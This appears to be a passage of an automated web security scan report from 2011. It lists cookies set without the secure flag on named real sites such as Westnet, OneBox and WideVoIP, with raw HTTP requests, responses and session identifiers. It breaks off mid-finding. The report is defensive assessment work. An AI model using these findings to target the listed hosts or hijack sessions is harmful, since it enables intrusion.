Content-Type: text/html; charset=UTF-8
Content-Length: 26318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="tr" xml:lang="tr">

...[SNIP]...
<td class="row2" height="50px" width="28%">
<form method="post" action="./ucp.php?mode=login&amp;sid=641dabe7c6bc0016fc0a1a07097bedba" style="float:left;position:relative;">    
<table width="100%" cellspacing="0">
...[SNIP]...
<input tabindex="100" class="post" type="text" name="username" size="10" />
                   
                   <input tabindex="101" class="post" type="password" name="password" size="10" />
               </td>
...[SNIP]...

7. SSL cookie without secure flag set  previous  next
There are 16 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


7.1. https://myaccount.westnet.com.au/Login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myaccount.westnet.com.au
Path:   /Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login.aspx?ReturnUrl=%2fDefault.aspx HTTP/1.1
Host: myaccount.westnet.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58409516.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58409516.2058560745.1305465388.1305465388.1305465388.1; __utmb=58409516.2.10.1305465388; __utmc=58409516; s_cc=true; s_nr=1305465655463; s_pv15=retail; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:21:01 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2qvhgrvniajgfqjmwl5x5sa3; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 26237


<html>
<head>
<title>MyAccount - Login</title>
<!-- Tracking -->

<link rel="stylesheet" href="/css/headings/all.css" type="text/css" media="all" />
<link rel="stylesheet" href
...[SNIP]...

7.2. https://secure1.wn.com.au/passwordrecovery/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure1.wn.com.au
Path:   /passwordrecovery/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /passwordrecovery/ HTTP/1.1
Host: secure1.wn.com.au
Connection: keep-alive
Referer: https://webmail.westnet.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:21:34 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=czqop0naxbczvi2xp4s3vx45; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 14817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Westnet - Password Recovery</title>
<meta name="Keywords" content="Wes
...[SNIP]...

7.3. https://webmail.westnet.com.au/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://webmail.westnet.com.au
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: webmail.westnet.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58409516.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58409516.2058560745.1305465388.1305465388.1305465388.1; __utmb=58409516.1.10.1305465388; __utmc=58409516; s_cc=true; s_nr=1305465388009; s_pv15=general; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:20:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2gs4tv45eo05uzi0yqtwyo2p; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
       <title>Westnet MyEmail</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta cont
...[SNIP]...

7.4. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /ereceptionist-api/signup/getAllOBRatePlans

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ereceptionist-api/signup/getAllOBRatePlans HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
Referer: https://www.new.onebox.com/pricing-receptionist_b
Origin: https://www.new.onebox.com
X-Request: JSON
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D
Content-Length: 15

accounttype=OBR

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=FDD30FFE5335612BF4DF5723DD8963FB.onebox1a; Path=/ereceptionist-api
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
X-TWA-Web: pa:27181
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 9978

{"api_results":{"returncode":"1","Rate_Plans":{"Rate_Plan":[{"overage_rate":"0.049","rebilling_amount":"109.70","rate_plan_name":"I09A","rate_plan_id":"1072","rppsid":"163","extensions":"9","freeminut
...[SNIP]...

7.5. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /ereceptionist-api/signup/getSessionCurrency

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ereceptionist-api/signup/getSessionCurrency HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
Referer: https://www.new.onebox.com/pricing-receptionist_b
Origin: https://www.new.onebox.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE701BF46F63028FB09E78B74876E55F.onebox1b; Path=/ereceptionist-api
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
X-TWA-Web: pb:27181
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 4

NULL

7.6. https://www.new.onebox.com/features/mobile-apps/android  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /features/mobile-apps/android

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/mobile-apps/android HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245|disable#browser%20timeout#1305469463

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:32 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=2EF0E2B285942486796C364C66E18DF6.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:32 GMT
Vary: Accept-Encoding
X-TWA-Web: pa:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 19589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.7. https://www.new.onebox.com/features/mobile-apps/blackberry  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /features/mobile-apps/blackberry

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/mobile-apps/blackberry HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245|disable#browser%20timeout#1305469463

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:31 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=051A33EDD70C71CD6EA4CD56F753975D.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:31 GMT
Vary: Accept-Encoding
X-TWA-Web: pa:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 19347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.8. https://www.new.onebox.com/features/mobile-apps/iphone  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /features/mobile-apps/iphone

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/mobile-apps/iphone HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; 12000PlanCookie=12000PlanCookie; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1305465387100-728648#1305467705|check#true#1305465905|PC#1305465387100-728648.17#1307280245|disable#browser%20timeout#1305469463

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:29 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=D357415C3729797C4D0BC6ADCE3558A6.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:29 GMT
Vary: Accept-Encoding
X-TWA-Web: pb:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 19516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.9. https://www.new.onebox.com/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; s_cc=true; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; s_sq=j2globalonebox%3D%2526pid%253Dnew%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.new.onebox.com%25252Fpricing-receptionist%2526ot%253DA; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467692|check#true#1305465892

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:24:03 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=A40B60C7EA273119DA36EC3735BE3B51.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:24:03 GMT
Vary: Accept-Encoding
X-TWA-Web: pb:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 17786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.10. https://www.new.onebox.com/pricing-receptionist_b  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.new.onebox.com
Path:   /pricing-receptionist_b

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pricing-receptionist_b HTTP/1.1
Host: www.new.onebox.com
Connection: keep-alive
Referer: http://www.new.onebox.com/pricing-receptionist
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=agczaiczbadzbdc//areacode=202+703+301//city=WASHINGTON//state=DC//country=US//region=NA//bandwidth=vhigh//timezone=EST//version=3"; __g_u=314850001880071_1_1_0_5_1305897382601_1; s_cc=true; __utmz=1.1305465388.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1641616652.1305465388.1305465388.1305465388.1; __utmc=1; __utmb=1.1.10.1305465388; s_sq=j2globalonebox%3D%2526pid%253Dnew%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.new.onebox.com%25252Fpricing-receptionist%2526ot%253DA; __g_c=w%3A1%7Cb%3A2%7Cc%3A314850001880071%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cr%3Ahttp%24*%24//www.new.onebox.com/home_1___1305465829703%7Cg%3A1; mbox=session#1305465387100-728648#1305467692|check#true#1305465892|PC#1305465387100-728648.17#1307280235

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:23:59 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=D4A6BC2F1A577644443D0DF165FB2FF9.onebox1a; Path=/onebox-cms-public
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 15 May 2011 13:23:59 GMT
Vary: Accept-Encoding
X-TWA-Web: pa:27181
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...

7.11. https://shop.widevoip.com/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /cart.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.php?_=1305473212087&add&ajax=true&qty=1&id_product=4&token=c2f1dad279e86a94006caa0cd37aee00 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DTR8L%2FDHa3UE%3DaGT%2Bje8pLuM%3DlzyeSQtGF%2F4%3DtoENHMEg8KU%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:54 GMT
Server: Apache
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3D3wkelsM%2BAB4%3D6dA5238occw%3Dg4BrSunH6Xc%3DvUCdZwdXaeE%3D; expires=Sat, 04-Jun-2011 15:26:54 GMT; path=/; domain=shop.widevoip.com
Content-Length: 561
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

{
'products': [
   {
       'id': 4,
       'link': 'http://shop.widevoip.com/product.php?id_product=4',
       'quantity': 1,
       'priceByLine': '224,14 ...',
       'name': 'Aastr
...[SNIP]...

7.12. https://shop.widevoip.com/index.php/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/index.php HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:20 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3D3iWrQypkK1M%3DCdeuoTucLxw%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DqCqiIdQ%2FjtA%3DO7fC4it1KIQ%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DMXL1tr%2BDw7k%3DPxm8lIuEK70%3DglGjERM1roc%3DGVznBQe8dzo%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DMXL1tr%2BDw7k%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DCd9NKtmFnms%3DgU1t2cjcXek%3DZxwBfJHKDnw%3DtoENHMEg8KU%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
